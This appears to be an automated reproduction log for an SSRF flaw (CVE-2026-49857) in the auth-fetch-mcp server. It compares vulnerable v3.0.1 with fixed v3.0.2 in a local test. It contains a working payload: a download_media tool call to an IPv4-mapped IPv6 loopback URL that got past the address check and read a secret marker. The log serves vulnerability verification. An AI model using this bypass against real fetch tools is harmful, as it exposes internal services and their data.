=== CVE-2026-49857 Reproduction === Date: Thu Jul 2 18:06:38 UTC 2026 ROOT: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle REPO: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/repo BROWSER_CACHE: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers Installing system dependencies for Chrome... Chrome for Testing 145.0.7632.6 (playwright chromium v1208) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium-1208 FFmpeg (playwright ffmpeg v1011) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/ffmpeg-1011 Chrome Headless Shell 145.0.7632.6 (playwright chromium-headless-shell v1208) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium_headless_shell-1208 FFmpeg (playwright ffmpeg v1011) Chrome version: 145.0.7632.6 Playwright revision: 1208 Chrome headless shell already installed at /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium_headless_shell-1208/chrome-headless-shell-linux64/chrome-headless-shell Chrome for Testing already installed at /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium-1208/chrome-linux64/chrome ══════════════════════════════════════════════════ Testing vulnerable (version v3.0.1) ══════════════════════════════════════════════════ HEAD is now at 98f381d 3.0.1 HEAD: 98f381d1298b6b7e7ff29d7a7851f18ea5f2364c Building... > auth-fetch-mcp@3.0.1 build > tsc Starting MCP server test... [VICTIM] Listening on 127.0.0.1:18080 marker=SSRF_SECRET_MARKER_1783015602673_hgnjlkyh [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"ssrf-test-client","vers [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.1"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://[::ffff:127.0.0.1]:18080/"]}}} [VICTIM:18080] 2026-07-02T18:06:43.648Z Request from 127.0.0.1 path=/ [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43\",\"downloaded\":1,\"total\":1,\"files\":[{\"url\":\"http://[::ffff:127.0.0.1]:18080/\", *** SSRF CONFIRMED [vulnerable]: Downloaded file contains internal server marker! *** === RESULT [vulnerable] === { "label": "vulnerable", "marker": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "timedOut": false, "serverStarted": true, "healthcheckPassed": true, "toolCallReceived": true, "ssrfConfirmed": true, "blocked": false, "browserError": false, "downloadedFile": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "downloadedContent": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "toolResult": { "status": "ok", "directory": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43", "downloaded": 1, "total": 1, "files": [ { "url": "http://[::ffff:127.0.0.1]:18080/", "localPath": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "size": 41 } ] }, "error": null } vulnerable RESULT: ssrfConfirmed=true blocked=false ══════════════════════════════════════════════════ Testing fixed (version v3.0.2) ══════════════════════════════════════════════════ HEAD is now at d4dedaf Merge pull request #10 from ymw0407/release/3.0.2 HEAD: d4dedaf55c1d39228dbed58807ea1f9fac1328e1 Building... > auth-fetch-mcp@3.0.2 build > tsc Starting MCP server test... [VICTIM] Listening on 127.0.0.1:18080 marker=SSRF_SECRET_MARKER_1783015605352_i2pfdlrc [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"ssrf-test-client","vers [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://[::ffff:127.0.0.1]:18080/"]}}} [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-fixed/.auth-fetch-mcp/downloads/2026-07-02T18-06-46\",\"downloaded\":0,\"total\":1,\"files\":[{\"url\":\"http://[::ffff:127.0.0.1]:18080/\",\"err *** BLOCKED [fixed]: Security guard rejected the URL *** === RESULT [fixed] === { "label": "fixed", "marker": "SSRF_SECRET_MARKER_1783015605352_i2pfdlrc", "timedOut": false, "serverStarted": true, "healthcheckPassed": true, "toolCallReceived": true, "ssrfConfirmed": false, "blocked": true, "browserError": false, "downloadedFile": null, "downloadedContent": null, "toolResult": { "status": "ok", "directory": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-fixed/.auth-fetch-mcp/downloads/2026-07-02T18-06-46", "downloaded": 0, "total": 1, "files": [ { "url": "http://[::ffff:127.0.0.1]:18080/", "error": "Refusing to fetch [::ffff:7f00:1] (resolves to private/loopback/link-local address ::ffff:7f00:1). To allow, set AUTH_FETCH_ALLOW_PRIVATE=1 or AUTH_FETCH_ALLOW_HOSTS=[::ffff:7f00:1]" } ] }, "error": null } fixed RESULT: ssrfConfirmed=false blocked=true ══════════════════════════════════════════════════ SUMMARY ══════════════════════════════════════════════════ Vulnerable (v3.0.1): SSRF=true Blocked=false Fixed (v3.0.2): SSRF=false Blocked=true Runtime manifest written to /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/repro/runtime_manifest.json ✅ CVE-2026-49857 REPRODUCED: SSRF via IPv4-mapped IPv6 loopback bypass Vulnerable v3.0.1 fetches loopback URL via download_media tool. Fixed v3.0.2 blocks it with assertSafeUrl guard.